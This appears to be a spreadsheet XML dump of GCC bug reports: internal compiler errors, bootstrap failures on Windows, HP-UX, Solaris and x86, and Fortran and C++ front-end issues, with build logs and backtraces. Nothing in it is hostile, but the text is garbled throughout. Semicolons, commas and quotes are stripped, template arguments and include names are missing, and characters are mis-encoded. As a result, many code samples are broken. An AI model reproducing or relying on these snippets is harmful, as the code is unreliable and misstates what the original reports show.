Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
See  for details.
Release:
gcc version gcc-2.96 19990621
Environment:
winNt with tornado 2</t>
  </si>
  <si>
    <t>ken_jessen</t>
  </si>
  <si>
    <t>GCC-81521</t>
  </si>
  <si>
    <t>[8 Regression] After [r250413] GCC 8.0 doesn't compile for Windows</t>
  </si>
  <si>
    <t>In [r250413] there is a patch Remove TYPE_METHODS. It breaks compiling GCC 8.0 for Windows (mingw-w64).
The bug is:
/home/ma/m/source/gcc-8/gcc/config/i386/winnt-cxx.c: In function â€˜void i386_pe_adjust_class_at_definition(tree)â€™:
/home/ma/m/source/gcc-8/gcc/config/i386/winnt-cxx.c:123:36: error: â€˜TYPE_METHODSâ€™ was not declared in this scope
       for (member = TYPE_METHODS (t) member  member = DECL_CHAIN (member))
                                    ^
/home/ma/m/source/gcc-8/gcc/config/i386/winnt-cxx.c:156:36: error: â€˜TYPE_METHODSâ€™ was not declared in this scope
       for (member = TYPE_METHODS (t) member  member = DECL_CHAIN (member))
                                    ^
/home/ma/m/source/gcc-8/gcc/config/i386/t-cygming:32: recipe for target 'winnt-cxx.o' failed
make[1]: *** [winnt-cxx.o] Error 1</t>
  </si>
  <si>
    <t>mateuszb</t>
  </si>
  <si>
    <t>GCC-1435</t>
  </si>
  <si>
    <t>jc1 segfaults on assignment combined with method call or field access</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: Java Gnats Server 
Cc: ashe@qms.com
Subject: gcj/56
Date: Fri 1 Oct 1999 17:37:55 -0700
 I'm adding the code from this PR to the libjava test suite.
 T
</t>
  </si>
  <si>
    <t>GCC-67931</t>
  </si>
  <si>
    <t>[6 Regression] Gcc [trunk revision 228704] failed to profiledbootstrap on x86_64</t>
  </si>
  <si>
    <t>Gcc [trunk revision 228704] failed to profiledbootstrap on x86_64
when configured with
../src-trunk/configure \
	 --prefix=/usr/6.0.0 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-libmpx --with-build-config=bootstrap-lto --disable-werror --with-fpmath=sse --enable-languages=cc++fortranjavaltoobjc
https://gcc.gnu.org/ml/gcc-regression/2015-10/msg00132.html:
0x732c0f symtab_node::verify()
	../../src-trunk/gcc/symtab.c:1084
0x738bbc cgraph_node::verify_cgraph_nodes()
	../../src-trunk/gcc/cgraph.c:3201
0x75b8db symbol_table::materialize_all_clones()
	../../src-trunk/gcc/cgraphclones.c:1151
0x756304 symbol_table::compile()
	../../src-trunk/gcc/cgraphunit.c:2431
0x63fda7 lto_main()
	../../src-trunk/gcc/lto/lto.c:3292
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[7]: *** [/tmp/ccKzjD0G.ltrans2.ltrans.o] Error 1
make[7]: *** Waiting for unfinished jobs....
lto-wrapper: fatal error: make returned 2 exit status
compilation terminated.
/usr/local/bin/ld: error: lto-wrapper failed
collect2: error: ld returned 1 exit status
Makefile:2644: recipe for target 'build/genconstants' failed
Revision 228700 is OK.</t>
  </si>
  <si>
    <t>GCC-44545</t>
  </si>
  <si>
    <t>[4.5 Regression] internal compiler error: in remove_unreachable_handlers at tree-eh</t>
  </si>
  <si>
    <t>A combination of options can yield the error:
internal compiler error: in remove_unreachable_handlers at tree-eh.c
To produce the error g++ is invoked thus:
g++ -c -pipe --trapv --non-call-exceptions --stack-check -O2
Aside from -pipe and -O2 which can be further decomposed the options are the minimal set to produce the error in this case.
Build from 
URL: svn://gcc.gnu.org/svn/gcc/branches/gcc-4_5-branch
Repository Root: svn://gcc.gnu.org/svn/gcc
Repository UUID: 138bc75d-0d04-0410-961f-82ee72b054a4
Revision: 160774
unset LDFLAGS
export CFLAGS=-pipe
export CXXFLAGS=-pipe
configure --enable-languages=c++
make bootstrap-lean
See attachment for source code of test case.
Taken from geany/scintilla.</t>
  </si>
  <si>
    <t>gxgjyyozme</t>
  </si>
  <si>
    <t>GCC-4351</t>
  </si>
  <si>
    <t>gcc internal error when compiling on HP-UX 11.00</t>
  </si>
  <si>
    <t>Internal error when compiling poa.cc from omniORB3.0.4 on HP-UX 11.00.  
In file included from localIdentity.h:48
                 from gccbug.cc:128:
../omniIdentity.h:51: warning: `class omniIdentity' has virtual functions but
   non-virtual destructor
In file included from gccbug.cc:128:
localIdentity.h:57: warning: `class omniLocalIdentity' has virtual functions
   but non-virtual destructor
gccbug.cc: In member function `virtual void
   PortableServer::POA::AdapterAlreadyExists::_raise()':
gccbug.cc:252: Internal error: Segmentation fault
The same file compiles on Linux gcc 2.95.2 gcc 3.0.1. and also using various other compilers on different platforms.  So this looks like HP-UX specific problem.
I renamed poa.cc to gccbug.cc and stripped it down a little before preprocessing it and attaching the preprocessed source.
How gcc was configured:
bash-2.02$ gcc -v
Reading specs from /usr/gnu/lib/gcc-lib/hppa2.0w-hp-hpux11.00/3.0.2/specs
Configured with: ../gcc/configure --prefix=/usr/gnu --with-gnu-as --with-as=/usr/gnu/bin/as --enable-threads=posix --enable-languages=cc++
Thread model: posix
gcc version 3.0.2 20010917 (prerelease)
Release:
gcc version 3.0.2 20010917 (prerelease)
Environment:
HP-UX 11.00
How-To-Repeat:
g++  -g -Wall -Wno-unused  -D_HPUX_SOURCE -D_POSIX_C_SOURCE=199506L -I. -I./.. -I./../.. -DUSE_omniORB_logStream -D_OMNIORB_LIBRARY -DUnixArchitecture -DCONFIG_DEFAULT_LOCATION='/etc/omniORB.cfg' -I.  -I../../../../include -D__hppa__ -D__hpux__ -D__OSVERSION__=11 -c gccbug.ii</t>
  </si>
  <si>
    <t>harri.pasanen</t>
  </si>
  <si>
    <t>GCC-2517</t>
  </si>
  <si>
    <t>-O2 compilation appears to cause a memory leak when a string is added to a char[]</t>
  </si>
  <si>
    <t>-O2 compilation appears to cause a memory leak when a string is added to a char[]
Release:
unknown
Environment:
mips-sgi-irix6.5
How-To-Repeat:
Compile the following with 'g++ -O2':
#include 
using namespace std
int main()
{
  string s1=his2
  while(true)
    s2=s1+ there.
  return(0)
}
and run while viewing memory usage using top.
The memory used quickly increases without bound.</t>
  </si>
  <si>
    <t>knuteson</t>
  </si>
  <si>
    <t>GCC-47249</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6 Regression] ICE in common_handle_option at opts.c:1695 with unknown option passed to cc1</t>
  </si>
  <si>
    <t>$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: i686-pc-linux-gnu
Configured with: ../configure --enable-languages=c++ --disable-bootstrap
Thread model: posix
gcc version 4.6.0 20110110 (experimental) [trunk revision 168633] (GCC) 
$ ./xgcc -B. ~/hw.c -Wp-pie 
cc1: internal compiler error: in common_handle_option at opts.c:1695
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Discovered in 4.4.x series.</t>
  </si>
  <si>
    <t>GCC-8264</t>
  </si>
  <si>
    <t>GCC3.2 Illegal Instruction building libgcc2.c</t>
  </si>
  <si>
    <t>mkdir /unpacked/objdir
cd /unpacked/objdir
/unpacked/gcc3.2/configure
make bootstrap
Build fails with:
./xgcc -B./ -B/usr/local/i586-pc-linux-gnu/bin/ -isystem /usr/local/i586-pc-linux-gnu/include -isystem /usr/local/i586-pc-linux-gnu/sys-include -O2
-DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2
-D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/unpacked/gcc-3.2/gcc -I/unpacked/gcc-3.2/gcc/. -I/unpacked/gcc-3.2/gcc/config
-I/unpacked/gcc-3.2/gcc/../include  -DL_floatdisf -c /unpacked/gcc-3.2/gcc/libgcc2.c -o libgcc/./_floatdisf.o
./xgcc -B./ -B/usr/local/i586-pc-linux-gnu/bin/ -isystem /usr/local/i586-pc-linux-gnu/include -isystem /usr/local/i586-pc-linux-gnu/sys-include -O2
-DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2
-D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/unpacked/gcc-3.2/gcc -I/unpacked/gcc-3.2/gcc/. -I/unpacked/gcc-3.2/gcc/config
-I/unpacked/gcc-3.2/gcc/../include  -DL_fixunsdfsi -c /unpacked/gcc-3.2/gcc/libgcc2.c -o libgcc/./_fixunsdfsi.o
/unpacked/gcc-3.2/gcc/libgcc2.c: In function `__fixunsdfsi':
/unpacked/gcc-3.2/gcc/libgcc2.c:1173: internal error: Illegal instruction
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./_fixunsdfsi.o] Error 1
make[3]: Leaving directory `/unpacked/objdir/gcc'
make[2]: *** [libgcc.a] Error 2
make[2]: Leaving directory `/unpacked/objdir/gcc'
make[1]: *** [stage2_build] Error 2
make[1]: Leaving directory `/unpacked/objdir/gcc'
make: *** [bootstrap] Error 2
[root@halcyon objdir]# 
  I'm sure it is not a hardware problem because it crashes in the same place everytime and the same system has done numerous kernel builds without any problems...
Release:
GCC3.2
Environment:
AMD K6-2 450Mhz 256Mb RAM
Linux 2.4.19
GLibc 2.2.4
How-To-Repeat:
Fails same place everytime I try to rebuild GCC3.2 on this system...</t>
  </si>
  <si>
    <t>GCC-25559</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] Internal compiler error when specifying vector_size(2) of int</t>
  </si>
  <si>
    <t>I have found this bug when playing a bit with the vector_size attribute. To reproduce just compile the attached program with
gcc  -march=pentium4 runsimd.c
Result:
runsimd.c:1: internal compiler error: in round_up at fold-const.c:11606
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>guilhem</t>
  </si>
  <si>
    <t>GCC-68468</t>
  </si>
  <si>
    <t>frv/bfin FDPIC toolchain build error</t>
  </si>
  <si>
    <t>Compile for fav cross-compiler fails with:
/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git-initial/./gcc/xgcc -B/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git-initial/./gcc/ -B/home/wbx/openadk/toolchain_toolchain-frv_uclibc-ng_frv_nommu/usr/frv-openadk-linux-uclibc/bin/ -B/home/wbx/openadk/toolchain_toolchain-frv_uclibc-ng_frv_nommu/usr/frv-openadk-linux-uclibc/lib/ -isystem /home/wbx/openadk/toolchain_toolchain-frv_uclibc-ng_frv_nommu/usr/frv-openadk-linux-uclibc/include -isystem /home/wbx/openadk/toolchain_toolchain-frv_uclibc-ng_frv_nommu/usr/frv-openadk-linux-uclibc/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fPIC -I. -I. -I../.././gcc -I/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc -I/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc/. -I/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc/../gcc -I/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc/../include    -o _gcov_merge_ior.o -MT _gcov_merge_ior.o -MD -MP -MF _gcov_merge_ior.dep -DL_gcov_merge_ior -c /home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc/libgcov-merge.c
/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc/unwind-dw2-fde-dip.c: In function '_Unwind_IteratePhdrCallback':
/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc/unwind-dw2-fde-dip.c:167:31: error: storage size of 'load_base' isn't known
   struct elf32_fdpic_loadaddr load_base
                               ^
/home/wbx/openadk/toolchain_build_toolchain-frv_uclibc-ng_frv_nommu/w-gcc-git-1/gcc-git/libgcc/unwind-dw2-fde-dip.c:167:31: warning: unused variable 'load_base' [-Wunused-variable]
make[6]: *** [unwind-dw2-fde-dip.o] Error 1
make[6]: *** Waiting for unfinished jobs....</t>
  </si>
  <si>
    <t>wbx</t>
  </si>
  <si>
    <t>GCC-54456</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE: in init_seqno at sel-sched.c:6797 with -fschedule-insns -fselective-scheduling</t>
  </si>
  <si>
    <t>Created attachment 28119
reduced testcase
Compiler output:
$ gcc -fschedule-insns -fselective-scheduling --param max-sched-extend-regions-iters=8 testcase.c 
testcase.c: In function 'foo':
testcase.c:5:1: internal compiler error: in init_seqno at sel-sched.c:6797
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  0x0000000001131fc0 in internal_error(char const* ...) ()
#1  0x0000000001130b74 in fancy_abort(char const* int char const*) ()
#2  0x00000000009aa0bf in init_seqno(bitmap_head_def* basic_block_def*) () at /mnt/svn/gcc-trunk/gcc/sel-sched.c:6797
#3  0x00000000009b7aa1 in sel_sched_region(int) () at /mnt/svn/gcc-trunk/gcc/sel-sched.c:7520
#4  0x00000000009b923a in run_selective_scheduling() () at /mnt/svn/gcc-trunk/gcc/sel-sched.c:7709
#5  0x0000000000988ffe in rest_of_handle_sched() () at /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3489
#6  0x000000000090092f in execute_one_pass(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2157
#7  0x0000000000900ce5 in execute_pass_list(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2212
#8  0x0000000000900cf7 in execute_pass_list(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2213
#9  0x00000000006bdd88 in expand_function(cgraph_node*) () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1609
#10 0x00000000006bff02 in compile() () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1803
#11 0x00000000006c0225 in finalize_compilation_unit() () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2089
#12 0x00000000005a1dc0 in c_write_global_declarations() () at /mnt/svn/gcc-trunk/gcc/c/c-decl.c:10116
#13 0x00000000009e8475 in compile_file() () at /mnt/svn/gcc-trunk/gcc/toplev.c:560
#14 0x00000000009ea03a in toplev_main(int char**) () at /mnt/svn/gcc-trunk/gcc/toplev.c:1863
#15 0x00007ffff6e784bd in __libc_start_main () from /lib64/libc.so.6
#16 0x0000000000584d01 in _start ()
Tested revisions:
r190830 - crash
4.7 r188682 - OK</t>
  </si>
  <si>
    <t>GCC-28172</t>
  </si>
  <si>
    <t>[4.2 and 4.1 only] alternate return in contained procedure segfaults</t>
  </si>
  <si>
    <t>schluter@pcl247d:~&gt; cat t.f90
program blubb
  call otherini(*998)
  stop
998 stop
contains
 subroutine init
   call otherini(*999)
   return
999 stop
 end subroutine init
end program blubb
schluter@pcl247d:~&gt; ~/src/gcc/build/stage3-gcc/f951 t.f90
 MAIN__ init
t.f90:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
schluter@pcl247d:~&gt; ~/src/gcc/build/stage3-gcc/f951 --version
GNU F95 version 4.2.0 20060618 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.2.0 20060618 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
schluter@pcl247d:~&gt;
Note that it seems necessary that the subroutine be called both from the program and the contained procedure.</t>
  </si>
  <si>
    <t>GCC-3537</t>
  </si>
  <si>
    <t>libstdc++-v3 bootstrap failure: multiple definitions (always involving basic_string.h:717)</t>
  </si>
  <si>
    <t>gmake bootstrap fails building libstdc++-v3
because of multiple definitions
always involving basic_string.h:717
...building ok up to here...
...
.libs/functexcept.o: In function `std::__throw_ios_failure(char const*)':
/package/gcc/gcc-3.00/libstdc++-v3/src/functexcept.cc:94: multiple definition of `bool std::lexicographical_compare(signed char const* signed char const* signed char const* signed char const*)'
.libs/stdexcept.o:/package/gcc/gcc-3.00/libstdc++-v3/include/bits/basic_string.h:717: first defined here
...
...lots of similar error messages...
...
.libs/valarray-inst.o: In function `void std::__valarray_copy(unsigned const* unsigned unsigned*)':
/package/gcc/gcc-3.00/libstdc++-v3/include/bits/valarray_array.h:237: multiple definition of `int std::__lexicographical_compare_3way(signed char const* signed char const* signed char const* signed char const*)'
.libs/stdexcept.o:/package/gcc/gcc-3.00/libstdc++-v3/include/bits/basic_string.h:717: first defined here
.libs/string-inst.o: In function `std::reverse_iterator &gt;::reverse_iterator(std::reverse_iterator &gt; const&amp;)':
/package/gcc/gcc-3.00/libstdc++-v3/include/bits/stl_iterator.h:217: multiple definition of `bool std::lexicographical_compare(signed char const* signed char const* signed char const* signed char const*)'
.libs/stdexcept.o:/package/gcc/gcc-3.00/libstdc++-v3/include/bits/basic_string.h:717: first defined here
.libs/string-inst.o: In function `std::reverse_iterator &gt;::reverse_iterator(std::reverse_iterator &gt; const&amp;)':
/package/gcc/gcc-3.00/libstdc++-v3/include/bits/stl_iterator.h:217: multiple definition of `int std::__lexicographical_compare_3way(signed char const* signed char const* signed char const* signed char const*)'
.libs/stdexcept.o:/package/gcc/gcc-3.00/libstdc++-v3/include/bits/basic_string.h:717: first defined here
collect2: ld returned 1 exit status
gmake[4]: *** [libstdc++.la] Error 1
gmake[4]: Leaving directory `/package/gcc/gcc-3.00-obj/sparc-sun-solaris2.6/libstdc++-v3/src'
gmake[3]: *** [all-recursive] Error 1
gmake[3]: Leaving directory `/package/gcc/gcc-3.00-obj/sparc-sun-solaris2.6/libstdc++-v3'
gmake[2]: *** [all-recursive-am] Error 2
gmake[2]: Leaving directory `/package/gcc/gcc-3.00-obj/sparc-sun-solaris2.6/libstdc++-v3'
gmake[1]: *** [all-target-libstdc++-v3] Error 2
gmake[1]: Leaving directory `/package/gcc/gcc-3.00-obj'
gmake: *** [bootstrap] Error 2
Release:
gcc version 3.0
Environment:
Solaris 2.6 on Ultra-1 (UltraSPARC-II) 32bit kernel
working gcc-2.95.2 installed GNU as GNU ld GNU make
environment settings: see under how to repeat.
How-To-Repeat:
on Sparc / Solaris 2.6
setenv CONFIG_SHELL /bin/ksh
setenv CCFLAGS = -Wall -fPIC -O3 -fkeep-inline-functions -funroll-loops -msupersparc -Qn -Wa-Qn -fno-ident -fno-implicit-templates -s
cd gcc-3.00-obj
../gcc-3.00/configure \
      --prefix=/usr/local/gcc-3.00 --enable-shared \
      --with-gnu-as --with-as=/usr/local/links/bin/gas \
      --with-gnu-ld --with-ld=/usr/local/links/bin/gld \
      --enable-threads --enable-threads=solaris \
      --with-cpu=supersparc --enable-cpp --enable-checking \
      --enable-version-specific-runtime-libs
gmake CONFIG_SHELL=/bin/ksh \
             BOOT_CFLAGS=$CCFLAGS \
             CFLAGS=$CCFLAGS \
             LIBCFLAGS=$CCFLAGS \
             LIBCXXFLAGS=$CCFLAGS \
             bootstrap</t>
  </si>
  <si>
    <t>nirkko</t>
  </si>
  <si>
    <t>GCC-42188</t>
  </si>
  <si>
    <t>[OOP] F03:C612. The leftmost part-name shall be the name of a data object.</t>
  </si>
  <si>
    <t>Follow-up to PR42048. Consider the following code:
module grid_module
 implicit none
 type grid
 contains
   procedure :: new_grid
   procedure :: new_int
 end type
contains
 subroutine new_grid(this)
   class(grid) :: this
 end subroutine
 integer function new_int(this)
   class(grid) :: this
   new_int = 42
 end function
end module
module field_module
 use grid_module
 implicit none
 type field
   type(grid) :: mesh
 end type
contains
 type(field) function new_field()
 end function
 subroutine test
   integer :: i
   type(grid) :: g
   g = new_field()%mesh
   call new_field()%mesh%new_grid()
   i = new_field()%mesh%new_int()
 end subroutine
end module
which is currently rejected with
test.f90:41.3:
   g = new_field()%mesh
   1
Error: Unclassifiable statement at (1)
test.f90:42.19:
   call new_field()%mesh%new_grid()
                   1
Error: Syntax error in CALL statement at (1)
test.f90:43.3:
   i = new_field()%mesh%new_int()
   1
Error: Unclassifiable statement at (1)
Rejecting it is fine I think but the error messages should be improved. ifort says
error #6837: The leftmost part-ref in a data-ref can not be a function
reference.   
The relevant parts from the standard are:
R612 data-ref is part-ref [ % part-ref ] ...
R613 part-ref is part-name [ ( section-subscript-list ) ]
C612 (R612) The leftmost part-name shall be the name of a data object.
2.4.3.1 Data object
A data object (often abbreviated to object) is a constant (4.1.2) a variable
(6) or a subobject of a constant.</t>
  </si>
  <si>
    <t>GCC-57195</t>
  </si>
  <si>
    <t>Mode attributes with specific mode iterator can not be used as mode iterators in *.md files</t>
  </si>
  <si>
    <t>There is a strange undocumented limitation when using mode attributes with specific mode iterator as mode iterators in *.md files. As an example from i386.md following RTX is accepted:
(define_insn_and_split copysign3_const
  [(set (match_operand:CSGNMODE 0 register_operand =x)
	(unspec:CSGNMODE
	  [(match_operand: 1 vector_move_operand xmC)
	   (match_operand:CSGNMODE 2 register_operand 0)
	   (match_operand: 3 nonimmediate_operand xm)]
	  UNSPEC_COPYSIGN))]
  ...)
However when equivalent named mode attribute (i.e.  below) is used in place of a mode iterator:
(define_insn_and_split copysign3_const
  [(set (match_operand:CSGNMODE 0 register_operand =x)
	(unspec:CSGNMODE
	  [(match_operand: 1 vector_move_operand xmC)
	   (match_operand:CSGNMODE 2 register_operand 0)
	   (match_operand: 3 nonimmediate_operand xm)]
	  UNSPEC_COPYSIGN))]
  ...)
compilation breaks with:
build/genconditions ../../gcc-svn/branches/gcc-4_8-branch/gcc/config/i386/i386.md &gt; tmp-condmd.c
../../gcc-svn/branches/gcc-4_8-branch/gcc/config/i386/i386.md:8866: unknown mode `&lt;CSGNMODE'
../../gcc-svn/branches/gcc-4_8-branch/gcc/config/i386/i386.md:8866: following context is `:CSGNVMODE&gt; 1 vector_move_operand xmC)'
The iterators are defined as:
(define_mode_iterator CSGNMODE [SF DF TF])
(define_mode_attr CSGNVMODE [(SF V4SF) (DF V2DF) (TF TF)])
I would like to use mode attribute with named mode in the following pattern:
(define_insn *vec_extract_zext
  [(set (match_operand:SWI48 0 register_operand =r)
	(zero_extend:SWI48
	  (vec_select:
	    (match_operand:PEXTR_MODE 1 register_operand x)
	    (parallel
	      [(match_operand:SI 2
		 const_0_to__operand)]))))]
where ssescalarmode mode attribute applies to PEXTR_MODE mode iterator and not to SWI48.</t>
  </si>
  <si>
    <t>GCC-58583</t>
  </si>
  <si>
    <t>[c++11] ICE with invalid non-static data member initialization in template</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++0x) is wrongly accepted since GCC 4.7.0 (when non-static data member initializers were introduced):
==============================
template struct A
{
  A* p = new A
}
==============================
Even instantiating A doesn't produce an error.
However without template the code is rejected correctly.
A slightly modified code snippet triggers an ICE:
==============================
struct B
{
  template struct A
  {
    A* p = new A
  }
}
==============================
bug.cc: In constructor 'constexpr B::A::A()':
bug.cc:3:26: internal compiler error: in tsubst_copy at cp/pt.c:12810
   template struct A
                          ^
0x5bbd53 tsubst_copy
        ../../gcc/gcc/cp/pt.c:12810
0x59aa12 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:14855
0x69636c perform_member_init
        ../../gcc/gcc/cp/init.c:538
0x69636c emit_mem_initializers(tree_node*)
        ../../gcc/gcc/cp/init.c:1093
0x6a0a2e synthesize_method(tree_node*)
        ../../gcc/gcc/cp/method.c:796
0x617659 mark_used(tree_node* int)
        ../../gcc/gcc/cp/decl2.c:4714
0x54889b build_over_call
        ../../gcc/gcc/cp/call.c:7116
0x54477e build_new_method_call_1
        ../../gcc/gcc/cp/call.c:7813
0x54477e build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
        ../../gcc/gcc/cp/call.c:7883
0x5456f2 build_special_member_call(tree_node* tree_node* vec** tree_node* int int)
        ../../gcc/gcc/cp/call.c:7440
0x699086 build_new_1
        ../../gcc/gcc/cp/init.c:2761
0x699086 build_new(vec** tree_node* tree_node* vec** int int)
        ../../gcc/gcc/cp/init.c:3001
0x645ad2 cp_parser_new_expression
        ../../gcc/gcc/cp/parser.c:7139
0x646097 cp_parser_unary_expression
        ../../gcc/gcc/cp/parser.c:6910
0x646b4f cp_parser_binary_expression
        ../../gcc/gcc/cp/parser.c:7701
0x64700f cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7937
0x647466 cp_parser_assignment_expression
        ../../gcc/gcc/cp/parser.c:7987
0x647466 cp_parser_constant_expression
        ../../gcc/gcc/cp/parser.c:8197
0x648a36 cp_parser_late_parse_one_default_arg
        ../../gcc/gcc/cp/parser.c:23055
0x637c35 cp_parser_late_parsing_nsdmi
        ../../gcc/gcc/cp/parser.c:23109
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-80991</t>
  </si>
  <si>
    <t>ICE with __is_trivially_constructible in template</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 5.1.0:
================================================================
template void foo()
{
  static_assert(__is_trivially_constructible(int int) )
}
void bar()
{
  foo()
}
================================================================
bug.cc: In function 'void foo()':
bug.cc:3:60: internal compiler error: tree check: expected class 'type' have 'exceptional' (tree_list) in dependent_type_p at cp/pt.c:23555
   static_assert(__is_trivially_constructible(int int) )
                                                            ^
0x1029257 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
	../../gcc/gcc/tree.c:9909
0x78cebf tree_class_check(tree_node* tree_code_class char const* int char const*)
	../../gcc/gcc/tree.h:3206
0x78cebf dependent_type_p(tree_node*)
	../../gcc/gcc/cp/pt.c:23555
0x805787 finish_static_assert(tree_node* tree_node* unsigned int bool)
	../../gcc/gcc/cp/semantics.c:8823
0x7577d0 cp_parser_static_assert
	../../gcc/gcc/cp/parser.c:13651
0x76f9b6 cp_parser_block_declaration
	../../gcc/gcc/cp/parser.c:12622
0x770199 cp_parser_declaration_statement
	../../gcc/gcc/cp/parser.c:12235
0x744ef3 cp_parser_statement
	../../gcc/gcc/cp/parser.c:10722
0x745fbd cp_parser_statement_seq_opt
	../../gcc/gcc/cp/parser.c:11054
0x74608f cp_parser_compound_statement
	../../gcc/gcc/cp/parser.c:11008
0x760853 cp_parser_function_body
	../../gcc/gcc/cp/parser.c:21445
0x760853 cp_parser_ctor_initializer_opt_and_function_body
	../../gcc/gcc/cp/parser.c:21483
0x765e61 cp_parser_function_definition_after_declarator
	../../gcc/gcc/cp/parser.c:26290
0x74f8bd cp_parser_function_definition_from_specifiers_and_declarator
	../../gcc/gcc/cp/parser.c:26202
0x74f8bd cp_parser_init_declarator
	../../gcc/gcc/cp/parser.c:19168
0x74fe3a cp_parser_single_declaration
	../../gcc/gcc/cp/parser.c:26748
0x76910c cp_parser_template_declaration_after_parameters
	../../gcc/gcc/cp/parser.c:26352
0x768d94 cp_parser_explicit_template_declaration
	../../gcc/gcc/cp/parser.c:26587
0x768d94 cp_parser_template_declaration_after_export
	../../gcc/gcc/cp/parser.c:26606
0x741c79 cp_parser_declaration
	../../gcc/gcc/cp/parser.c:12472
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-20868</t>
  </si>
  <si>
    <t>reference to upper bound of assumed-size array</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
 INTEGER :: X(10)
 CALL T(X)
 END
SUBROUTINE T(X)
 INTEGER :: X(*)
 WRITE(6*) UBOUND(X)
END SUBROUTINE</t>
  </si>
  <si>
    <t>GCC-58932</t>
  </si>
  <si>
    <t>[4.9 Regression][C++11] Deleted functions and SFINAE in partial template specializations</t>
  </si>
  <si>
    <t>Created attachment 31114
Testcase
Using:
$ gcc-snapshot --version
gcc-snapshot (Debian 20131021-1) 4.9.0 20131021 (experimental) [trunk revision 203899]
with flags -std=c++11 -Wall. The testcase is modified from PR 37208 (http://gcc.gnu.org/bugzilla/show_bug.cgi?id=37208). I'm fairly confident that previous 4.9 snapshots used to accept that kind of code (i.e. compile undefined references notwithstanding) and I think 4.8 does -- no copy of 4.8.2 on hand though.</t>
  </si>
  <si>
    <t>GCC-83781</t>
  </si>
  <si>
    <t>[8 Regression] Bootstrap failed on x86 with --with-arch=corei7 --with-cpu=corei7</t>
  </si>
  <si>
    <t>I got
trunk/gcc/hsa-dump.c
../../src-trunk/gcc/hsa-dump.c: In function â€˜void dump_hsa_symbol(FILE* hsa_symbol*)â€™:
../../src-trunk/gcc/hsa-dump.c:784:21: error: â€˜%sâ€™ directive writing up to 71 bytes into a region of size 62 [-Werror=format-overflow=]
       sprintf (buf __%s_%i hsa_seg_name (symbol-&gt;m_segment)
                     ^~~~~~~~~
../../src-trunk/gcc/hsa-dump.c:784:15: note: â€˜sprintfâ€™ output between 5 and 86 bytes into a destination of size 64
       sprintf (buf __%s_%i hsa_seg_name (symbol-&gt;m_segment)
       ~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         symbol-&gt;m_name_number)
and
../../src-trunk/gcc/config/i386/i386.c: In function 'const char* output_set_got(rtx rtx)':
../../src-trunk/gcc/config/i386/i386.c:10653:20: error: '%s' directive writing up to 323 bytes into a region of size 13 [-Werror=format-overflow=]
     sprintf (name __x86.get_pc_thunk.%s reg_names[regno])
